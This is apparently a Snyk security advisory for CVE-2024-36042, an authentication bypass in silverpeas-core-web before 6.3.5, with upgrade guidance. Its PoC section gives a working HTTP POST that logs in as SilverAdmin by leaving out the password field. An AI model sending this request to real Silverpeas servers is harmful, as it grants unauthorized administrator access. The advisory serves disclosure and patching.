Improper Authentication Affecting org.silverpeas.core:silverpeas-core-web package, versions [,6.3.5)
Threat Intelligence
Exploit Maturity
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGSILVERPEASCORE-7210307
- published 5 Jun 2024
- disclosed 3 Jun 2024
- credit Unknown
Introduced: 3 Jun 2024
CVE-2024-36042 Open this link in a new tabHow to fix?
Upgrade org.silverpeas.core:silverpeas-core-web
to version 6.3.5 or higher.
Overview
org.silverpeas.core:silverpeas-core-web is a WEB platform that improves the collaboration between the actors of a company or organization.
Affected versions of this package are vulnerable to Improper Authentication via the AuthenticationServlet
. An attacker can gain unauthorized access and potentially obtain superadmin privileges by omitting the Password field during the authentication process.
PoC
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded
Login=SilverAdmin&DomainId=0
References
CVSS Scores
version 3.1